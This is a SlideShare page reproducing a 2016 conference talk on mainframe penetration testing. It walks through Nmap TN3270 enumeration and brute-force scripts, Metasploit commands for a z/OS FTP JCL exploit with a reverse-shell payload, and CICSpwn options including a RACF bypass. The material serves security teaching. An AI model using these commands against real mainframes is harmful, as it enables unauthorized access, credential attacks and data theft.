Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
VANGUARD SECURITY & COMPLIANCE 2016
Philip Young
ZedSec 390
CST08
Advanced Mainframe
Hacking
SECURITY & COMPLIANCE
CONFERE...
VANGUARD SECURITY & COMPLIANCE 2016
Disclaimer
I’m not here in the
name of or on behalf of
my employer. All
opinions expre...
About Me!
VANGUARD SECURITY & COMPLIANCE 2016
Purpose
This session will:
• Go	over	the	tools	introduced	in	
Mondays	keynote	
• Expla...
VANGUARD SECURITY & COMPLIANCE 2016
Tools Covered
• Nmap
• Metasploit
• CICSpwn
• ELV.APF
VANGUARD SECURITY & COMPLIANCE 2016
Platform
• Linux (Kali Linux)
• Vmware
• macOS
• VPS
VANGUARD SECURITY & COMPLIANCE 2016
Kali Linux
• A Linux distribution
• Comes pre-loaded with multiple
tools:
• BURP	
• Me...
DEMO
VANGUARD SECURITY & COMPLIANCE 2016
Nmap
• Created in 1997
• By: Fyodor
• Mostly ‘C’
• Includes Service Detection
• Added ...
VANGUARD SECURITY & COMPLIANCE 2016
Nmap
• Network MAP
• Uses various techniques to
discover open ports
• E.G. “Syn Scan”
VANGUARD SECURITY & COMPLIANCE 2016
Service Probes
• Identify what is running on a port
• Uses TCP/UDP probes
VANGUARD SECURITY & COMPLIANCE 2016
Nmap Probes
• Use the flag: ‘-sV’
• Null Probe:
Matches	data	sent	to	Nmap	
• Approx 4,...
VANGUARD SECURITY & COMPLIANCE 2016
TN3270 Null Probe
match -> ‘Match	the	following’ 
Tn3270 -> ‘with tn3270’ 

m|^xffxfdx...
VANGUARD SECURITY & COMPLIANCE 2016
Other Probes
• TCP Probes
• Send Data, inspect reply
• For example Network Job Entry
P...
VANGUARD SECURITY & COMPLIANCE 2016
NJE Probe
• Sends an invalid NJE ‘OPEN’
packet
• Waits for either ‘ACK’ or ‘NAK’ in
EB...
Nmap without Service Probes
Nmap WITH Service Probes
VANGUARD SECURITY & COMPLIANCE 2016
Nmap Scripting
Engine (NSE)
• Composed of Libraries and scripts
• Over 530 scripts ava...
VANGUARD SECURITY & COMPLIANCE 2016
NSE Categories
AUTH
BROADCAST
BRUTE
DEFAULT
DISCOVERY
DOS
EXPLOIT
EXTERNAL
FUZZER
INTR...
VANGUARD SECURITY & COMPLIANCE 2016
TN3270 NSE Library
• A ‘virtual’ TN3270 terminal written
in Lua
• Available:
https://g...
VANGUARD SECURITY & COMPLIANCE 2016
Invoke
• To invoke scripts use the flag
--script
( is line continuation in linux)

nma...
VANGUARD SECURITY & COMPLIANCE 2016
Additional TN3270
Scripts
• VTAM Applid Enumeration
• TSO:
• User	ID	EnumeraFon	
• Pas...
VANGUARD SECURITY & COMPLIANCE 2016
Additional TN3270
Scripts
• VTAM Applid Enumeration
• TSO:
• User	ID	EnumeraFon	
• Pas...
VANGUARD SECURITY & COMPLIANCE 2016
TSO User
Enumeration
• Let’s walk through the arguments:
•  Note	the	Libraries:	brute	...
VANGUARD SECURITY & COMPLIANCE 2016
CICS Transaction
Enumeration
Argument	 Defini5on	
brute.maxthreads=100	
Max	number	of	c...
DEMO
VANGUARD SECURITY & COMPLIANCE 2016
Metasploit Framework
• Developed by H.D. Moore 2003
• Moved to Ruby in 2007
• Created ...
VANGUARD SECURITY & COMPLIANCE 2016
Using MSF
• Run ‘msfconsole’
• To list all exploits: show exploits
• Run the ONLY z/os...
VANGUARD SECURITY & COMPLIANCE 2016
Set options
• Exploit options:
Op5on	 Defini5on	
FTPUSER	 User	ID	to	use.	
FTPPASS	 Pas...
VANGUARD SECURITY & COMPLIANCE 2016
Metasploit Payload
Options
Now select a payload:
set payload cmd/mainframe/reverse_she...
DEMO
VANGUARD SECURITY & COMPLIANCE 2016
CICSpwn
• Release this year by Ayoul
• Relies on CEMT/CEDA
transaction IDs (for now)
•...
VANGUARD SECURITY & COMPLIANCE 2016
Interesting Options
Invoke with: python cicspwn
Flag	 Defini5on	
-i	 Gather	informaFon	...
DEMO
Where To From
Here?
VANGUARD SECURITY & COMPLIANCE 2016
Escalation
• So far only network based
• What happens after access is
granted?
VANGUARD SECURITY & COMPLIANCE 2016
Some Ideas
• Storage ‘scrapers’ to gather system
information (think ‘IPLINFO’ but buil...
VANGUARD SECURITY & COMPLIANCE 2016
Why Not?
• Make your own tools?
I’d prefer the tools come with what
the experts need, ...
Contact:
mainframed767@
gmail.com

@mainframed767
VANGUARD SECURITY & COMPLIANCE 2016
Thank you!
SECURITY & COMPLIANCE
CONFERENCE 2016
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Advanced mainframe hacking
Upcoming SlideShare
Loading in …5
×

Advanced mainframe hacking

630 views

Published on

Vanguard Compliance and Security class teaching how to use the various cybersecurity tools out there for mainframe hacking.

Published in: Technology
  • Be the first to comment

Advanced mainframe hacking

  1. 1. VANGUARD SECURITY & COMPLIANCE 2016 Philip Young ZedSec 390 CST08 Advanced Mainframe Hacking SECURITY & COMPLIANCE CONFERENCE 2016
  2. 2. VANGUARD SECURITY & COMPLIANCE 2016 Disclaimer I’m not here in the name of or on behalf of my employer. All opinions expressed here are my own.
  3. 3. About Me!
  4. 4. VANGUARD SECURITY & COMPLIANCE 2016 Purpose This session will: • Go over the tools introduced in Mondays keynote • Explain what’s going on behind the scenes • Show you how to use the tools
  5. 5. VANGUARD SECURITY & COMPLIANCE 2016 Tools Covered • Nmap • Metasploit • CICSpwn • ELV.APF
  6. 6. VANGUARD SECURITY & COMPLIANCE 2016 Platform • Linux (Kali Linux) • Vmware • macOS • VPS
  7. 7. VANGUARD SECURITY & COMPLIANCE 2016 Kali Linux • A Linux distribution • Comes pre-loaded with multiple tools: • BURP • Metasploit • BeeF • Many more
  8. 8. DEMO
  9. 9. VANGUARD SECURITY & COMPLIANCE 2016 Nmap • Created in 1997 • By: Fyodor • Mostly ‘C’ • Includes Service Detection • Added Scripting Engine in ‘07
  10. 10. VANGUARD SECURITY & COMPLIANCE 2016 Nmap • Network MAP • Uses various techniques to discover open ports • E.G. “Syn Scan”
  11. 11. VANGUARD SECURITY & COMPLIANCE 2016 Service Probes • Identify what is running on a port • Uses TCP/UDP probes
  12. 12. VANGUARD SECURITY & COMPLIANCE 2016 Nmap Probes • Use the flag: ‘-sV’ • Null Probe: Matches data sent to Nmap • Approx 4,000 ‘Null Probes’ Let’s look at TN3270*: match tn3270 m|^xffxfdx1d| p/IBM Telnet TN3270/ i/3270-REGIME/ * line 4606 in nmap-service-probes
  13. 13. VANGUARD SECURITY & COMPLIANCE 2016 TN3270 Null Probe match -> ‘Match the following’ Tn3270 -> ‘with tn3270’ m|^xffxfdx1d| xffxfdx1d = IAC DO TN3270E p/IBM Telnet TN3270/ = Set to ‘IBM Telnet…’
  14. 14. VANGUARD SECURITY & COMPLIANCE 2016 Other Probes • TCP Probes • Send Data, inspect reply • For example Network Job Entry Probe:
  15. 15. VANGUARD SECURITY & COMPLIANCE 2016 NJE Probe • Sends an invalid NJE ‘OPEN’ packet • Waits for either ‘ACK’ or ‘NAK’ in EBCDIC
  16. 16. Nmap without Service Probes
  17. 17. Nmap WITH Service Probes
  18. 18. VANGUARD SECURITY & COMPLIANCE 2016 Nmap Scripting Engine (NSE) • Composed of Libraries and scripts • Over 530 scripts available • 121 Libraries • Uses Lua
  19. 19. VANGUARD SECURITY & COMPLIANCE 2016 NSE Categories AUTH BROADCAST BRUTE DEFAULT DISCOVERY DOS EXPLOIT EXTERNAL FUZZER INTRUSIVE MALWARE SAFE VERSION VULN
  20. 20. VANGUARD SECURITY & COMPLIANCE 2016 TN3270 NSE Library • A ‘virtual’ TN3270 terminal written in Lua • Available: https://github.com/ zedsec390/NMAP • Allows for the following:
  21. 21. VANGUARD SECURITY & COMPLIANCE 2016 Invoke • To invoke scripts use the flag --script ( is line continuation in linux) nmap -sV --script tn3270-screen
  22. 22. VANGUARD SECURITY & COMPLIANCE 2016 Additional TN3270 Scripts • VTAM Applid Enumeration • TSO: • User ID EnumeraFon • Password Brute Force • CICS: • TransacFon EnumeraFon • User ID EnumeraFon • User Password Brute Forcing
  23. 23. VANGUARD SECURITY & COMPLIANCE 2016 Additional TN3270 Scripts • VTAM Applid Enumeration • TSO: • User ID EnumeraFon • Password Brute Force • CICS: • TransacFon EnumeraFon • User ID EnumeraFon • User Password Brute Forcing
  24. 24. VANGUARD SECURITY & COMPLIANCE 2016 TSO User Enumeration • Let’s walk through the arguments: •  Note the Libraries: brute & unpwdb Argument Defini5on brute.maxthreads=100 Max number of concurrent connecFons. Set to 100. userdb=‘/tmp/users.txt’ File with usernames you want to test. tso-enum.commands=‘TSOL5’ The command used to get to TSO.
  25. 25. VANGUARD SECURITY & COMPLIANCE 2016 CICS Transaction Enumeration Argument Defini5on brute.maxthreads=100 Max number of concurrent connecFons. Set to 100. idlist=‘/tmp/users.txt’ File with CICS transacFons you’re looking for. cics-enum.commands=‘CICSTS29’ The command used to get to the CICS region. cics-enum.path=‘/home/test’ Successfully idenFfied transacFon screenshots will be placed in this folder.
  26. 26. DEMO
  27. 27. VANGUARD SECURITY & COMPLIANCE 2016 Metasploit Framework • Developed by H.D. Moore 2003 • Moved to Ruby in 2007 • Created an easy to use exploit platform • Chad Rikansrud (@bigendiansmalls) add JCL and z/OS architecture support in 2016
  28. 28. VANGUARD SECURITY & COMPLIANCE 2016 Using MSF • Run ‘msfconsole’ • To list all exploits: show exploits • Run the ONLY z/os ‘exploit’ use exploit/mainframe/ftp/ftp_jcl_creds • Show the options with: show options • Fill in the options you need • Select which ‘payload’ you want to use
  29. 29. VANGUARD SECURITY & COMPLIANCE 2016 Set options • Exploit options: Op5on Defini5on FTPUSER User ID to use. FTPPASS Password to use. RHOST FTP Hostname/IP address of target LPAR RPORT FTP port (use Nmap)
  30. 30. VANGUARD SECURITY & COMPLIANCE 2016 Metasploit Payload Options Now select a payload: set payload cmd/mainframe/reverse_shell_jcl Change the payload options: Op5on Defini5on LHOST Our Hostname or IP address LPORT The port you want metasploit to open a listener on.
  31. 31. DEMO
  32. 32. VANGUARD SECURITY & COMPLIANCE 2016 CICSpwn • Release this year by Ayoul • Relies on CEMT/CEDA transaction IDs (for now) • Uses CEMT to upload and execute JCL/REXX • Can be used to assess CICS and break in to environments • Requires Python 2.7
  33. 33. VANGUARD SECURITY & COMPLIANCE 2016 Interesting Options Invoke with: python cicspwn Flag Defini5on -i Gather informaFon -A Test all opFons -s Upload JCL to be executed by CICS user (requires CEMT) --bypass Will bypass RACF if CEDA is available.
  34. 34. DEMO
  35. 35. Where To From Here?
  36. 36. VANGUARD SECURITY & COMPLIANCE 2016 Escalation • So far only network based • What happens after access is granted?
  37. 37. VANGUARD SECURITY & COMPLIANCE 2016 Some Ideas • Storage ‘scrapers’ to gather system information (think ‘IPLINFO’ but built in to metasploit) • Automated APF tools to attempt privilege escalation through zapping APF authorized modules • Data dumping tools to grab all datasets • SMP/E corruption
  38. 38. VANGUARD SECURITY & COMPLIANCE 2016 Why Not? • Make your own tools? I’d prefer the tools come with what the experts need, so they have it without knowing about it
  39. 39. Contact: mainframed767@ gmail.com @mainframed767
  40. 40. VANGUARD SECURITY & COMPLIANCE 2016 Thank you! SECURITY & COMPLIANCE CONFERENCE 2016

×